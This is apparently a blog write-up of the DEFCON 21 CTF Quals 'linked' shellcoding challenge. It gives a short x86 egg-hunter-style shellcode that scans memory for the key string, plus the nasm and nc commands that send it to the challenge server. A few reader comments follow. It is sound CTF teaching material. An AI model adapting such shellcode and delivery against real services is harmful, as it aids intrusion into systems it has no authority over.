DEFCON 21 CTF Quals `linked` writeup

linked was a shellcoding challenge worth 3 points at DEFCON 21 CTF Quals

http://assets.shallweplayaga.me/linked.txt
Running at linked.shallweplayaga.me:22222 OR linked2.shallweplayaga.me:22222

linked.txt:

 typedef struct _llist {
   struct _llist *next;
   uint32_t tag;
   char data[100];
 llist;

and:

register char *answer;
char *(*func)();
llist *head;
...
func = (char *(*)(llist *))userBuf;
answer = (char *)(*func)(head);
send_string(answer);
exit(0);

Write me shellcode that traverses the randomly generated linked list, looking for a node with a tag 0x41414100, and returns a pointer to the data associated with that tag, such that the call to send_string will output the answer.

Tests showed that linked was running on x86 – and by tests I mean “\xeb\xfe” :P. After trying to write and optimize shellcode for doing the job, I thought of an easier attack vector. Instead of writing the shellcode to find the node with the given tag, I thought of scanning memory in order to find the key directly (since all keys start with “The key is:”), much like an egg hunter. The shellcode turned out to be a whole lot shorter than the limit (a whole 2 bytes :).

Code:

bits 32

pop edx
pop eax
mov ebx, 'The '

_loop:
    inc eax
    cmp [eax], ebx
    jnz _loop

jmp edx

; yep, i can afford nops
nop
nop

See it in action:

x-n2o@istari:~$ nasm linked.asm -o linked
x-n2o@istari:~$ nc linked.shallweplayaga.me 22222 < linked
List built.  Send me your shellcode.  Max size: 16
The key is: Who says ESP isn't general purpose!?!?

~ X-N2O

Tags: , , ,

3 Responses to “DEFCON 21 CTF Quals `linked` writeup”

  1. greg says:

    hah, that was a pretty nice solution! i took the manual route and wrote the 16 byte shellcode to traverse the linked list. way to think outside the box !

  2. Menno says:

    Your tutorials and guides have been of great use to me and I really appreciate it. I had some questions though concerning the use of some of your source code examples. Would it be possible for me to send you a private message?

  3. MT says:

    Hi,
    I am trying to compile your Twofish code seen on
    http://www.rohitab.com/discuss/topic/36074-c-twofish/
    to no avail as it is missing “twofish_init” and bunch of other
    stuff which most likely would be found in “twofish.h”
    May I receive the above two files via email please?

    Thanks a lot

Leave a Reply